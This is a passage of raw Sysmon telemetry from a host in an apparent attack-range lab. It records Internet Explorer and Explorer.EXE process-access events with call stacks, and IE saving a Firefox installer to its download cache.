10341000x800000000000000013759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:30.849{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.255{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.235{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.235{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.231{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+50ec20(wow64) 10341000x800000000000000013779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.052{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.037{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.037{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:34.021{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000013802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:36.959{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\A7VCHC9W\Firefox%20Installer[1].exe2021-01-18 13:59:36.959 10341000x800000000000000013801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:36.551{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+